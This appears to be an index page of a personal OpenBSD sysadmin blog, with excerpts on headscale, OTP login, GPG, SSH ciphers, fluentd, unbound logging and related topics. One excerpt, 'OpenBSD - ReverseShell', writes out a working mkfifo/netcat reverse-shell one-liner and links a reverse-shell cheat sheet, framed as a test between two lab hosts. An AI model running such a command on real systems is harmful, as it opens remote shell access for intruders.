Headscale - Real World Example

Tailscale on Public Intrnet Setup Let’s build a few machines around the world and get our hands dirty with headscale / tailscale. headscale amsterdam tailscale stockholm miami singapore sydney goal is to build a fullmesh network with all 4 tailscale clients Headscale Server install OpenBSD 7.2 (needs golang 1.19) as described here Generate Install Key let’s generate a reusable install key for all 4 clients. It’s valid for 1 hour.

Headscale - OpenBSD

Running Headscale Server on OpenBSD i like and widely use wireguard for my infrastructure. i’m also aware of it’s limitation and i know the tailscale project but never gave try. recently, i stumbled upon the headscale project, an opensource alternative to for the (closed) tailscale server. perfect, let’s give a try! and, of course, i’m gooing to implement this with OpenBSD, what else ;) Doku https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md on the Server compile and install server this is working on OpenBSD 7.

OpenBSD & OTP

i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations Build login_otp git clone https://github.com/reyk/login_otp cd login_otp make obj make all doas make install Initialize OTP DB doas otp -i Generate Key for User otp -g Name: stoege Key: xxxx xxxx xxxx xxxx xxxx xxxx xx URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30 Build QR Code echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI Url Shortener wrote a little URL Shortener in Python with FastAPI and a wrapper script for cli usage. needs httpie & jq packages. python backend is under development, cli wrapper for different os right here … Usage somehost$ ./myurlshort usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe https://url.stoege.net/xXxXx CLI Wrappers OpenBSD cat << 'EOF' > myurlshort #!/usr/bin/env bash # url shortener for openbsd, v1.0, 2022-09-12, by @stoege which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; ) which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; ) if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

macOS

some adaption for macOS Shell macOS is using zsh since while. If you wanna switch back to bash, here some Notes …" Switch to Bash chsh -s /bin/bash install brew the famous package manager for macOS /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" install keychain if you work with ssh agent, you may wanna try keychain … brew install keychain build .bash_profile this will overwrite your existing .bash_profile cp ~/.bash_profile ~/.bash_profile.$(date "+%s")~ cat << 'EOF' > ~/.

GPG & Gopass & Gitlab

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

OpenBSD - ReverseShell

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

PuffyPages

some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCAN 2022 https://www.youtube.com/watch?v=1n62VZj-CKI OARC Reply Size Tester dig +short rs.dns-oarc.net TXT Host1 - good :) # dig +short rs.dns-oarc.net TXT rst.x4090.rs.dns-oarc.net. rst.x4058.x4090.rs.dns-oarc.net. rst.x4064.x4058.x4090.rs.dns-oarc.net. "45.15.80.80 DNS reply size limit is at least 4090" "45.15.80.80 sent EDNS buffer size 4096" Host2 - bad :( # dig +short rs.dns-oarc.net TXT rst.x1196.rs.dns-oarc.net. rst.x1206.x1196.rs.dns-oarc.net. rst.x1204.x1206.x1196.rs.dns-oarc.net. "74.63.25.240 DNS reply size limit is at least 1206" "74.63.25.240 sent EDNS buffer size 1232" sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Fluent - Data Collector

Fluentd is an open-source data collector for a unified logging layer. Fluentd allows you to unify data collection and consumption for better use and understanding of data. Docu https://docs.fluentd.org/ http://fluentular.herokuapp.com/ Install Ruby pkg_add ruby-3.1.2 Set Symlinks ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Fluentd gem install fluentd more Symlinks ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd Create Config fluentd --setup /etc/fluent Edit config cat << 'EOF ' > /etc/fluent/fluent.

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that. Connection UPS to APU via USB Cable dmesg show the UPS connected APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

SSH - Cipher, Key, MAC

SSH Stuff Supported Ciphers, Key, MAC on OpenBSD 7.1. Not all of them are good for useage, here is my recommendation. Recommended for your sshd_config / ssh_config Ciphers aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes128-cbc HostKeyAlgorithms ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com, sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256 Kexalgorithms curve25519-sha256@libssh.org,diffie-hellman-group16-sha512, diffie-hellman-group18-sha512,diffie-hellman-group14-sha256 MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com PubKeyAcceptedKeyTypes ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com, rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com, ssh-rsa-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-25 List of all available Types Cipher ssh -Q cipher 3des-cbc aes128-cbc aes192-cbc aes256-cbc aes128-ctr aes192-ctr aes256-ctr aes128-gcm@openssh.com aes256-gcm@openssh.com chacha20-poly1305@openssh.com HostbasedAcceptedAlgorithms ssh -Q HostbasedAcceptedAlgorithms ssh-ed25519 ssh-ed25519-cert-v01@openssh.com sk-ssh-ed25519@openssh.com sk-ssh-ed25519-cert-v01@openssh.com ssh-rsa rsa-sha2-256 rsa-sha2-512 ssh-dss ecdsa-sha2-nistp256 ecdsa-sha2-nistp384 ecdsa-sha2-nistp521 sk-ecdsa-sha2-nistp256@openssh.

OpenBSD - Full Disk Encryption

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.

JC - JSON from CLI

how to build json from cli we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping add package doas pkg_add jc try ping openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null { "destination_ip": "1.1.1.1", "data_bytes": 56, "pattern": null, "destination": "1.1.1.1", "packets_transmitted": 3, "packets_received": 3, "packet_loss_percent": 0.0, "duplicates": 0, "round_trip_ms_min": 9.219, "round_trip_ms_avg": 9.826, "round_trip_ms_max": 10.158, "round_trip_ms_stddev": 0.43, "responses": [ { "type": "reply", "bytes": 64, "response_ip": "1.1.1.1", "icmp_seq": 0, "ttl": 59, "time_ms": 10.

Unbound - Logging

Enable Logging for Unbound update unbound.conf /var/unbound/etc/unbound.conf server: logfile: /log/unbound.log verbosity: 1 log-queries: yes ... create folder/logfile log=/var/unbound/log/unbound.log doas mkdir /var/unbound/log/ touch $log chmod 660 $log chown _unbound:_unbound $log restart service doas rcctl restart unbound tail logfile tail -f /var/unbound/log/unbound.log # tail -f /var/unbound/log/unbound.log [1660208341] unbound[3279:0] notice: init module 0: validator [1660208341] unbound[3279:0] notice: init module 1: iterator [1660208341] unbound[3279:0] info: start of service (unbound 1.15.0). [1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.